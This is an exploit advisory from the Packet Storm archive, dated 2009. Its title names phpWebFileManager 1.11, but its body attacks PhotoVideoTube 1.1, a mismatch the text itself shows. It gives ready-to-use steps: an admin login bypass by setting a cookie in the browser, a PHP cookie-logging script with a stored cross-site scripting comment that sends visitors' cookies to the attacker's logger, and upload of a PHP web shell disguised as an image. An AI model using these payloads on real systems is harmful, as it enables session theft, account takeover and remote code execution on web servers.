phpWebFileManager 1.11 Bypass / Shell Upload

2009-05-24T00:00:00
ID PACKETSTORM:77773
Type packetstorm
Reporter Hakxer
Modified 2009-05-24T00:00:00

Description

                                        
                                            ` ___ ___ __   
/ | \_____ | | _____ ___ ___________  
/ ~ \__ \ | |/ /\ \/ // __ \_ __ \  
\ Y // __ \| < > <\ ___/| | \/  
\___|_ /(____ /__|_ \/__/\_ \\___ >__|   
\/ \/ \/ \/ \/ :: Egy Coders Team Researcher  
  
/- PhotoVideoTube v 1.1 => Multiple Vulnerabilities  
/- ( Insecure Cookie Handling & Cookie Grabber & Upload Shell )  
/- http://photovideotube.com/  
/- see demo script and executing vulnerabilities  
/- Greetz : ExH , ProViDoR , Error Code , Bright D@rk , Sinaritx  
  
* hi every body  
* this script have a three vulnerabilities the first one  
* cookie handling you can bypass control panel  
* paste this js code  
* javascript:document.cookie="username=admin";  
* then go to http://host/path/admin/main.php  
* now we are in a control panel  
  
* ok second vulnerability Cookie Grabber  
* first make file ( logger.php ) and paste this code in it  
<?php  
$cookie = $_GET['cookie'];  
$logger = fopen("logger.txt", "a");  
fwrite($logger, $cookie ."\n");  
fclose($logger);  
?>  
* and chmod file to 777  
* now go to http://host/path/comment_pics.php?imgId=id  
* and write this comment  
* <script>document.location ="http://host/path/logger.php?cookie=" + document.cookie;</script>  
* and click submit  
* now if admin seen this picture cookie will sent to your logger.txt  
  
* third vulnerability  
* first make a account  
* and go to upload photos http://host/path/upload_pics.php  
* and upload shell like shell.php.jpg  
* then show shell  
  
* Be Safe  
  
`